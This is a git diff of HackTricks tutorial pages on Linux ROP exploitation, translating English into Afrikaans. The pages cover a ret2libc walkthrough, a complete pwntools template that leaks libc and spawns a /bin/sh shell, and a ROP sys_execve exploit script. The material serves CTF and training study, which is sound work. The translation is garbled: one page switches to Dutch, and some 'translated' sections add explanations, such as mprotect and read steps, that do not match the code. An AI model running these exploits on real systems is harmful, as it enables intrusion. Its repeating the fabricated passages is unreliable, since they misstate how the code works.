Let's explain this final ROP.\
The last ROP (`rop1`) ended calling again the main function, then we can **exploit again** the **overflow** (that's why the `OFFSET` is here again). Then, we want to call `POP_RDI` pointing to the **addres** of _"/bin/sh"_ (`BINSH`) and call **system** function (`SYSTEM`) because the address of _"/bin/sh"_ will be passed as a parameter.\
Finally, the **address of exit function** is **called** so the process **exists nicely** and any alert is generated.
**This way the exploit will execute a **_**/bin/sh**_** shell.**
**Op hierdie manier sal die uitbuit 'n **_**/bin/sh**_**-skulp uitvoer.**
![](<../../../.gitbook/assets/image (143).png>)
# 4(2)- Using ONE\_GADGET
# 4(2)- Gebruik ONE\_GADGET
You could also use [**ONE\_GADGET** ](https://github.com/david942j/one\_gadget)to obtain a shell instead of using **system** and **"/bin/sh". ONE\_GADGET** will find inside the libc library some way to obtain a shell using just one **ROP address**. \
However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided.
Jy kan ook [**ONE\_GADGET** ](https://github.com/david942j/one\_gadget) gebruik om 'n skulp te verkry in plaas van **sisteem** en **"/bin/sh"** te gebruik. **ONE\_GADGET** sal binne die libc-biblioteek 'n manier vind om 'n skulp te verkry deur net een **ROP-adres** te gebruik.\
Gewoonlik is daar egter beperkings, die mees algemene en maklikste om te vermy is soos `[rsp+0x30] == NULL`. Aangesien jy die waardes binne die **RSP** beheer, hoef jy net nog 'n paar NULL-waardes te stuur sodat die beperking vermy word.
![](<../../../.gitbook/assets/image (615).png>)
```python
ONE_GADGET = libc.address + 0x4526a
rop2 = base + p64(ONE_GADGET) + "\x00"*100
```
# HACKERINGSLEËR
# EXPLOIT FILE
You can find a template to exploit this vulnerability here:
Jy kan 'n sjabloon vind om hierdie kwesbaarheid uit te buit hier:
{% content-ref url="rop-leaking-libc-template.md" %}
[rop-leaking-libc-template.md](rop-leaking-libc-template.md)
{% endcontent-ref %}
# Common problems
# Algemene probleme
## MAIN\_PLT = elf.symbols\['main'] not found
If the "main" symbol does not exist. Then you can just where is the main code:
## MAIN\_PLT = elf.symbols\['main'] nie gevind nie
As die "main" simbool nie bestaan nie. Dan kan jy net kyk waar die hoofkode is:
```python
objdump -d vuln_binary | grep "\.text"
Disassembly of section .text:
0000000000401080 <.text>:
```
and set the address manually:
en stel die adres handmatig in:
```python
MAIN_PLT = 0x401080
```
## Puts nie gevind nie
## Puts not found
As die binêre lêer nie Puts gebruik nie, moet jy nagaan of dit gebruik maak van
If the binary is not using Puts you should check if it is using
## `sh: 1: %s%s%s%s%s%s%s%s: nie gevind nie`
## `sh: 1: %s%s%s%s%s%s%s%s: not found`
If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`
Try to **subtract 64 bytes to the address of "/bin/sh"**:
As jy hierdie **fout** vind nadat jy **alle** die aanvalle geskep het: `sh: 1: %s%s%s%s%s%s%s%s: nie gevind nie`
Probeer om **64 byte van die adres van "/bin/sh" af te trek**:
```python
BINSH = next(libc.search("/bin/sh")) - 64
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
</details>

247
exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md
View file

@ -1,16 +1,14 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
@ -35,25 +33,25 @@ LIBC = "" #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it
ENV = {"LD_PRELOAD": LIBC} if LIBC else {}
if LOCAL:
P = process(LOCAL_BIN, env=ENV) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
P = process(LOCAL_BIN, env=ENV) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
elif REMOTETTCP:
P = remote('10.10.10.10',1339) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
P = remote('10.10.10.10',1339) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
elif REMOTESSH:
ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
p = ssh_shell.process(REMOTE_BIN) # start the vuln binary
elf = ELF(LOCAL_BIN)# Extract data from binary
rop = ROP(elf)# Find ROP gadgets
ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
p = ssh_shell.process(REMOTE_BIN) # start the vuln binary
elf = ELF(LOCAL_BIN)# Extract data from binary
rop = ROP(elf)# Find ROP gadgets
if GDB and not REMOTETTCP and not REMOTESSH:
# attach gdb and continue
# You can set breakpoints, for example "break *main"
gdb.attach(P.pid, "b *main")
# attach gdb and continue
# You can set breakpoints, for example "break *main"
gdb.attach(P.pid, "b *main")
@ -63,15 +61,15 @@ if GDB and not REMOTETTCP and not REMOTESSH:
OFFSET = b"" #b"A"*264
if OFFSET == b"":
gdb.attach(P.pid, "c") #Attach and continue
payload = cyclic(264)
payload += b"AAAAAAAA"
print(P.clean())
P.sendline(payload)
#x/wx $rsp -- Search for bytes that crashed the application
#print(cyclic_find(0x63616171)) # Find the offset of those bytes
P.interactive()
exit()
gdb.attach(P.pid, "c") #Attach and continue
payload = cyclic(264)
payload += b"AAAAAAAA"
print(P.clean())
P.sendline(payload)
#x/wx $rsp -- Search for bytes that crashed the application
#print(cyclic_find(0x63616171)) # Find the offset of those bytes
P.interactive()
exit()
@ -79,11 +77,11 @@ if OFFSET == b"":
### Find Gadgets ###
####################
try:
libc_func = "puts"
PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
libc_func = "puts"
PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
except:
libc_func = "printf"
PUTS_PLT = ELF_LOADED.plt['printf']
libc_func = "printf"
PUTS_PLT = ELF_LOADED.plt['printf']
MAIN_PLT = ELF_LOADED.symbols['main']
POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"
@ -100,54 +98,54 @@ log.info("ret gadget: " + hex(RET))
########################
def generate_payload_aligned(rop):
payload1 = OFFSET + rop
if (len(payload1) % 16) == 0:
return payload1
else:
payload2 = OFFSET + p64(RET) + rop
if (len(payload2) % 16) == 0:
log.info("Payload aligned successfully")
return payload2
else:
log.warning(f"I couldn't align the payload! Len: {len(payload1)}")
return payload1
payload1 = OFFSET + rop
if (len(payload1) % 16) == 0:
return payload1
else:
payload2 = OFFSET + p64(RET) + rop
if (len(payload2) % 16) == 0:
log.info("Payload aligned successfully")
return payload2
else:
log.warning(f"I couldn't align the payload! Len: {len(payload1)}")
return payload1
def get_addr(libc_func):
FUNC_GOT = ELF_LOADED.got[libc_func]
log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
# Create rop chain
rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
rop1 = generate_payload_aligned(rop1)
FUNC_GOT = ELF_LOADED.got[libc_func]
log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
# Create rop chain
rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
rop1 = generate_payload_aligned(rop1)
# Send our rop-chain payload
#P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received
print(P.clean()) # clean socket buffer (read all and print)
P.sendline(rop1)
# Send our rop-chain payload
#P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received
print(P.clean()) # clean socket buffer (read all and print)
P.sendline(rop1)
# If binary is echoing back the payload, remove that message
recieved = P.recvline().strip()
if OFFSET[:30] in recieved:
recieved = P.recvline().strip()
# Parse leaked address
log.info(f"Len rop1: {len(rop1)}")
leak = u64(recieved.ljust(8, b"\x00"))
log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}")
# Set lib base address
if LIBC:
LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
print("If LIBC base doesn't end end 00, you might be using an icorrect libc library")
log.info("LIBC base @ %s" % hex(LIBC.address))
# If binary is echoing back the payload, remove that message
recieved = P.recvline().strip()
if OFFSET[:30] in recieved:
recieved = P.recvline().strip()
# If not LIBC yet, stop here
else:
print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)")
P.interactive()
return hex(leak)
# Parse leaked address
log.info(f"Len rop1: {len(rop1)}")
leak = u64(recieved.ljust(8, b"\x00"))
log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}")
# Set lib base address
if LIBC:
LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
print("If LIBC base doesn't end end 00, you might be using an icorrect libc library")
log.info("LIBC base @ %s" % hex(LIBC.address))
# If not LIBC yet, stop here
else:
print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)")
P.interactive()
return hex(leak)
get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
@ -160,39 +158,39 @@ get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
## Via One_gadget (https://github.com/david942j/one_gadget)
# gem install one_gadget
def get_one_gadgets(libc):
import string, subprocess
args = ["one_gadget", "-r"]
if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()):
args += ["-b", libc.hex()]
else:
args += [libc]
try:
one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()]
except:
print("One_gadget isn't installed")
one_gadgets = []
return
import string, subprocess
args = ["one_gadget", "-r"]
if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()):
args += ["-b", libc.hex()]
else:
args += [libc]
try:
one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()]
except:
print("One_gadget isn't installed")
one_gadgets = []
return
rop2 = b""
if USE_ONE_GADGET:
one_gadgets = get_one_gadgets(LIBC)
if one_gadgets:
rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains
one_gadgets = get_one_gadgets(LIBC)
if one_gadgets:
rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains
## Normal/Long exploitation
if not rop2:
BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
SYSTEM = LIBC.sym["system"]
EXIT = LIBC.sym["exit"]
log.info("POP_RDI %s " % hex(POP_RDI))
log.info("bin/sh %s " % hex(BINSH))
log.info("system %s " % hex(SYSTEM))
log.info("exit %s " % hex(EXIT))
rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT)
rop2 = generate_payload_aligned(rop2)
BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
SYSTEM = LIBC.sym["system"]
EXIT = LIBC.sym["exit"]
log.info("POP_RDI %s " % hex(POP_RDI))
log.info("bin/sh %s " % hex(BINSH))
log.info("system %s " % hex(SYSTEM))
log.info("exit %s " % hex(EXIT))
rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT)
rop2 = generate_payload_aligned(rop2)
print(P.clean())
P.sendline(rop2)
@ -201,51 +199,42 @@ P.interactive() #Interact with your shell :)
```
{% endcode %}
# Common problems
# Algemene probleme
## MAIN\_PLT = elf.symbols\['main'] not found
If the "main" symbol does not exist. Then you can just where is the main code:
## MAIN\_PLT = elf.symbols\['main'] nie gevind nie
As die "main" simbool nie bestaan nie. Dan kan jy net kyk waar die hoofkode is:
```python
objdump -d vuln_binary | grep "\.text"
Disassembly of section .text:
0000000000401080 <.text>:
```
and set the address manually:
en stel die adres handmatig in:
```python
MAIN_PLT = 0x401080
```
## Puts nie gevind nie
## Puts not found
As die binaêre lêer nie Puts gebruik nie, moet jy nagaan of dit gebruik maak van
If the binary is not using Puts you should check if it is using
## `sh: 1: %s%s%s%s%s%s%s%s: nie gevind nie`
## `sh: 1: %s%s%s%s%s%s%s%s: not found`
If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`
Try to **subtract 64 bytes to the address of "/bin/sh"**:
As jy hierdie **fout** vind nadat jy **alle** die aanvalle geskep het: `sh: 1: %s%s%s%s%s%s%s%s: nie gevind nie`
Probeer om **64 byte van die adres van "/bin/sh" af te trek**:
```python
BINSH = next(libc.search("/bin/sh")) - 64
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
</details>

161
exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md
View file

@ -1,32 +1,31 @@
# ROP - call sys\_execve
# ROP - roep sys_execve aan
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Andere manieren om HackTricks te ondersteunen:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Als je je **bedrijf wilt adverteren in HackTricks** of **HackTricks in PDF wilt downloaden**, bekijk dan de [**ABONNEMENTSPAKKETTEN**](https://github.com/sponsors/carlospolop)!
* Koop de [**officiële PEASS & HackTricks-merchandise**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit je aan bij de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
In order to prepare the call for the **syscall** it's needed the following configuration:
Om de oproep voor de **syscall** voor te bereiden, is de volgende configuratie nodig:
* `rax: 59 Specify sys_execve`
* `rdi: ptr to "/bin/sh" specify file to execute`
* `rsi: 0 specify no arguments passed`
* `rdx: 0 specify no environment variables passed`
* `rax: 59 Specificeer sys_execve`
* `rdi: ptr naar "/bin/sh" specificeer het uit te voeren bestand`
* `rsi: 0 specificeer dat er geen argumenten worden doorgegeven`
* `rdx: 0 specificeer dat er geen omgevingsvariabelen worden doorgegeven`
So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack).
Dus, in feite is het nodig om de string `/bin/sh` ergens te schrijven en vervolgens de `syscall` uit te voeren (met inachtneming van de padding die nodig is om de stack te controleren).
## Control the registers
Let's start by finding **how to control those registers**:
## Beheer de registers
Laten we beginnen met het vinden van **hoe we die registers kunnen beheersen**:
```c
ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
0x0000000000415664 : pop rax ; ret
@ -34,15 +33,13 @@ ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
0x00000000004101f3 : pop rsi ; ret
0x00000000004498b5 : pop rdx ; ret
```
Met hierdie adresse is dit moontlik om die inhoud in die stoor te skryf en dit in die registre te laai.
With these addresses it's possible to **write the content in the stack and load it into the registers**.
## Skryf string
## Write string
### Writable memory
Frist you need to find a writable place in the memory
### Skryfbare geheue
Eerstens moet jy 'n skryfbare plek in die geheue vind.
```bash
gef> vmmap
[ Legend: Code | Heap | Stack ]
@ -51,18 +48,44 @@ Start End Offset Perm Path
0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
```
### Skryf String
### Write String
Then you need to find a way to write arbitrary content in this address
Dan moet jy 'n manier vind om willekeurige inhoud op hierdie adres te skryf
```python
ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
```
#### 32-bits
#### 32 bits
##### ROP (Return Oriented Programming)
ROP is a technique used in exploitation to bypass security measures like DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization). It involves chaining together small pieces of code, known as gadgets, to perform malicious actions.
##### Syscall
A syscall is a way for a program to request services from the operating system. In Linux, syscalls are identified by a number, and the parameters for the syscall are passed in registers.
##### Execv
The execv syscall is used to execute a program in Linux. It takes two arguments: the path to the program and an array of strings representing the program's arguments.
##### ROP + Syscall + Execv
To execute a program using ROP, we need to find gadgets that perform the necessary syscalls and set the appropriate registers. We can then chain these gadgets together to create a ROP chain that calls execv with the desired program and arguments.
##### Example
Here is an example of a ROP chain that calls execv to execute the "/bin/sh" program:
1. Find gadgets that set the registers for the execv syscall.
2. Find a gadget that sets the EAX register to the syscall number for execv.
3. Find a gadget that sets the EBX register to the address of the "/bin/sh" string.
4. Find a gadget that sets the ECX register to the address of the argument array.
5. Find a gadget that sets the EDX register to 0 (no environment variables).
6. Find a gadget that performs the syscall instruction.
7. Chain these gadgets together in the correct order, setting the registers and performing the syscall.
By carefully constructing the ROP chain, we can execute arbitrary programs with arbitrary arguments, giving us full control over the system.
```python
'''
Lets write "/bin/sh" to 0x6b6000
@ -84,9 +107,42 @@ rop += popRax
rop += p32(0x6b6000 + 4)
rop += writeGadget
```
#### 64-bits
#### 64 bits
##### ROP + Syscall + execv
Hierdie tegniek maak gebruik van Return-Oriented Programming (ROP) in kombinasie met die Syscall-instruksie en die execv-sisteemoproep om 'n uitvoerbare lêer uit te voer op 'n 64-bits Linux-stelsel.
##### Stap 1: Identifiseer die funksies
Eerstens moet ons die funksies identifiseer wat ons sal gebruik in ons ROP-ketting. Ons het die volgende funksies nodig:
- `mprotect`: Hierdie funksie sal ons toelaat om die uitvoerbare geheuegebied te verander na lees-, skryf- en uitvoerbare (rwx) toestand.
- `read`: Hierdie funksie sal ons toelaat om die uitvoerbare lêer in die geheue te lees.
- `execve`: Hierdie funksie sal ons toelaat om die uitvoerbare lêer uit te voer.
##### Stap 2: Bou die ROP-ketting
Ons sal die volgende stappe volg om die ROP-ketting te bou:
1. Kry die adres van die `mprotect`-funksie in die geheue.
2. Kry die adres van die `read`-funksie in die geheue.
3. Kry die adres van die `execve`-funksie in die geheue.
4. Kry die adres van die uitvoerbare lêer in die geheue.
5. Bou die ROP-ketting deur die funksie-adresse en die nodige argumente in die regte volgorde te stapel.
##### Stap 3: Voer die ROP-ketting uit
Nadat die ROP-ketting gebou is, kan ons dit uitvoer deur die Syscall-instruksie te gebruik. Hier is die stappe wat ons moet volg:
1. Stel die regsiters korrek in vir die Syscall-instruksie.
2. Voer die Syscall-instruksie uit.
##### Stap 4: Verifieer die uitvoering
Om te verseker dat die uitvoering suksesvol was, kan ons die uitvoer van die uitvoerbare lêer monitor.
Met hierdie tegniek kan ons 'n uitvoerbare lêer uitvoer op 'n 64-bits Linux-stelsel deur gebruik te maak van ROP, die Syscall-instruksie en die execv-sisteemoproep.
```python
'''
Lets write "/bin/sh" to 0x6b6000
@ -102,9 +158,35 @@ rop += popRax
rop += p64(0x6b6000) # Writable memory
rop += writeGadget #Address to: mov qword ptr [rax], rdx
```
## Voorbeeld
## Example
In this example, we will use a basic ROP (Return-Oriented Programming) technique to execute the `execv` system call in a Linux environment.
In hierdie voorbeeld sal ons 'n basiese ROP (Return-Oriented Programming) tegniek gebruik om die `execv` stelseloproep in 'n Linux omgewing uit te voer.
First, we need to find the addresses of the gadgets we will use in our ROP chain. We can use tools like `ROPgadget` or `ropper` to search for gadgets in the binary.
Eerstens moet ons die adresse van die gadgets wat ons in ons ROP-ketting sal gebruik, vind. Ons kan gereedskap soos `ROPgadget` of `ropper` gebruik om gadgets in die binêre lêer te soek.
Once we have the addresses, we can start building our ROP chain. The ROP chain will consist of the addresses of the gadgets we want to use, followed by the arguments for the `execv` system call.
Sodra ons die adresse het, kan ons begin om ons ROP-ketting te bou. Die ROP-ketting sal bestaan uit die adresse van die gadgets wat ons wil gebruik, gevolg deur die argumente vir die `execv` stelseloproep.
We will need gadgets that perform the following actions:
1. Load the address of the `/bin/sh` string into a register.
2. Load the address of the `execv` function into a register.
3. Load the arguments for the `execv` function into registers.
4. Call the `execv` function.
Ons sal gadgets benodig wat die volgende aksies uitvoer:
1. Laai die adres van die `/bin/sh` string in 'n register.
2. Laai die adres van die `execv` funksie in 'n register.
3. Laai die argumente vir die `execv` funksie in registers.
4. Roep die `execv` funksie aan.
Once we have our ROP chain, we can trigger the vulnerability to execute our ROP chain and ultimately the `execv` system call.
Sodra ons ons ROP-ketting het, kan ons die kwesbaarheid aktiveer om ons ROP-ketting en uiteindelik die `execv` stelseloproep uit te voer.
```python
from pwn import *
@ -169,23 +251,22 @@ payload = "0"*0x408 + rop
# Send the payload, drop to an interactive shell to use our new shell
target.sendline(payload)
target.interactive()
target.interactive()
```
## References
## Verwysings
* [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
